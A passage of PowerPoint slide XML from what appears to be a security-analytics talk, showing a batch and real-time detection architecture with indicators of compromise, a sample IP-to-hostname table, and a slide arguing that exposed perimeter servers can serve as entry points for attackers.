            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Picture 19" descr="Screen Shot 2016-01-10 at 9.54.44 PM.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32149" y="4356262"/>
            <a:ext cx="784035" cy="449954"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="21" name="Picture 20"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3816184" y="4465561"/>
            <a:ext cx="488024" cy="274778"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="435" name="Rectangle 434"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2775640" y="2346039"/>
            <a:ext cx="743441" cy="392413"/>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34289" tIns="34289" rIns="34289" bIns="34289" numCol="1" spcCol="38100" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="342900" latinLnBrk="1" hangingPunct="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
                <a:sym typeface="Avenir Roman"/>
              </a:rPr>
              <a:t>Distributed ETL</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="436" name="TextBox 435"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3548014" y="2191780"/>
            <a:ext cx="756194" cy="657872"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="525" dirty="0"/>
              <a:t>Username = select coallesce(user_name, hostname, IP) from Active_ID_Table where IP = ‘10.10.100.23)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="437" name="Straight Arrow Connector 436"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="435" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3147360" y="2120247"/>
            <a:ext cx="1" cy="225792"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="190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aphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="438" name="Table 437"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2661460" y="1807491"/>
          <a:ext cx="2233982" cy="264093"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="377993"/>
                <a:gridCol w="726272"/>
                <a:gridCol w="606593"/>
                <a:gridCol w="523124"/>
              </a:tblGrid>
              <a:tr h="88031">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="500" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>IP</a:t>
                      </a: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500" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>DHCP.MAC</a:t>
                      </a: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500" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>DHCP_Lasteventtime</a:t>
                      </a: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c>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="500" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FFFFFF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>AD_FQDN</a:t>
                      </a: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79646"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="88031">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="500" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>10.100.1.23</a:t>
                      </a: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500" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>58:5c:35:c3:6e:a4</a:t>
                      </a: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500" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>2014-03-11T14:00:00</a:t>
                      </a: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c>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="500" b="0" i="0" u="none" strike="noStrike" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>joe.eng.acme.com</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="500" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Calibri"/>
                      </a:endParaRP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7DEE8"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="88031">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="500" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>10.13.11.221</a:t>
                      </a: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500" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>12:3a:74:b2:6a:22</a:t>
                      </a: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500" b="0" i="0" u="none" strike="noStrike" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>2014-03-12T14:30:00</a:t>
                      </a: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c>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="l" fontAlgn="b"/>
                      <a:r>
                        <a:rPr lang="en-US" sz="500" b="0" i="0" u="none" strike="noStrike" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Calibri"/>
                        </a:rPr>
                        <a:t>ad.hr.acme.com</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="500" b="0" i="0" u="none" strike="noStrike" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:effectLst/>
                        <a:latin typeface="Calibri"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="8021" marR="8021" marT="8021"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AEEF3"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="161" name="Picture 160"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId13"/>
          <a:srcRect t="20075" r="2133" b="21827"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4584411" y="3973366"/>
            <a:ext cx="1220643" cy="989003"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="447" name="Picture 446" descr="process-analytics-lightorange-4x.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94405" y="1274514"/>
            <a:ext cx="366843" cy="510960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="452" name="Picture 4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44392" y="350406"/>
            <a:ext cx="481786" cy="510986"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="164" name="Picture 163"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId16"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3032150" y="1310083"/>
            <a:ext cx="956629" cy="244831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="165" name="Picture 164"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId17"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4383367" y="2223198"/>
            <a:ext cx="1557182" cy="682448"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="455" name="TextBox 454"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5298472" y="1523908"/>
            <a:ext cx="1027657" cy="577081"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0"/>
              <a:t>Sequential Models and IOC’s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="454" name="TextBox 453"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2195818" y="2800456"/>
            <a:ext cx="581568" cy="415498"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0"/>
              <a:t>Data Ingest</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="457" name="Straight Arrow Connector 456"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="2100990" y="2071584"/>
            <a:ext cx="320303" cy="186831"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:headEnd type="oval"/>
            <a:tailEnd type="triangle" w="lg" len="lg"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:style>
          <a:lnRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="1">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="459" name="TextBox 458"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3925744" y="3605393"/>
            <a:ext cx="1317335" cy="507831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0"/>
              <a:t>Large Scale Models and Non-Sequential IOC’s </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="460" name="Picture 459" descr="server-black-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4078478" y="4035574"/>
            <a:ext cx="212858" cy="260641"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="466" name="Left-Right Arrow 465"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="2761510" y="3107899"/>
            <a:ext cx="688367" cy="140837"/>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38570" tIns="19285" rIns="38570" bIns="19285"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="385694">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="975" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Myriad Pro" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="61" name="TextBox 60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4084480" y="1063229"/>
            <a:ext cx="1685945" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Real Time Layer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="TextBox 61"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1257038" y="3787249"/>
            <a:ext cx="814007" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Batch Layer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="Rectangle 53"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6883330" y="1369330"/>
            <a:ext cx="925997" cy="1806122"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="22225" cap="flat">
            <a:prstDash val="sysDash"/>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55" name="Picture 54" descr="www-blue.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId18">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect l="40416" t="40950" r="40416" b="44726"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7054583" y="1369329"/>
            <a:ext cx="589634" cy="570209"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="56" name="Picture 55" descr="network-globe-orange-4x.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08966" y="2584166"/>
            <a:ext cx="487301" cy="487301"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="TextBox 56"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7002600" y="2006025"/>
            <a:ext cx="759557" cy="784830"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0"/>
              <a:t>Hybrid View (Batch + Real Time)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="58" name="Left-Right Arrow 57"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="6795110" y="3260523"/>
            <a:ext cx="518946" cy="140837"/>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38570" tIns="19285" rIns="38570" bIns="19285"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="385694">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="975" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="Myriad Pro" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="51" name="Right Arrow 50"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6057900" y="2498009"/>
            <a:ext cx="926264" cy="247771"/>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77139" tIns="77139" rIns="77139" bIns="77139" anchor="ctr" anchorCtr="1"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="385694"/>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="Right Arrow 51"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6441019" y="1969859"/>
            <a:ext cx="543146" cy="253340"/>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77139" tIns="77139" rIns="77139" bIns="77139" anchor="ctr" anchorCtr="1"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="385694"/>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="Right Arrow 52"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6232297" y="2224207"/>
            <a:ext cx="751868" cy="273801"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="81000">
                <a:srgbClr val="00405B"/>
              </a:gs>
              <a:gs pos="15000">
                <a:schemeClr val="accent5"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="0"/>
            <a:tileRect/>
          </a:gradFill>
          <a:ln w="25400">
            <a:noFill/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:innerShdw blurRad="165100" dist="50800" dir="16200000">
              <a:schemeClr val="bg1">
                <a:alpha val="28000"/>
              </a:schemeClr>
            </a:innerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="77139" tIns="77139" rIns="77139" bIns="77139" anchor="ctr" anchorCtr="1"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" defTabSz="385694"/>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13893786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45025"/>
            <a:ext cx="8520600" cy="760200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Perimeter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>ssets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>ecome </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>nexpected </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>B</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0" smtClean="0"/>
              <a:t>ack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>doors</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Shape 85"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1475550"/>
            <a:ext cx="8520600" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Or more like a front door.... As they are exposed to the entire world, it is possible to begin a campaign by attacking network perimeter assets and from there get your way into the organization. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Consider this… Most organizations nowadays only expose 80 or 443, so it is logical that web servers are prime targets as well as other internet delivered services such as: MAIL, CMS, CRM, Dev, Storage, etc.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79700" y="411025"/>
            <a:ext cx="8520600" cy="572700"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" dirty="0"/>
              <a:t>Do you think they might use same credentials internally? Maybe mail clients? Storage?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="91" name="Shape 91" descr="rudynmap.jpg"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
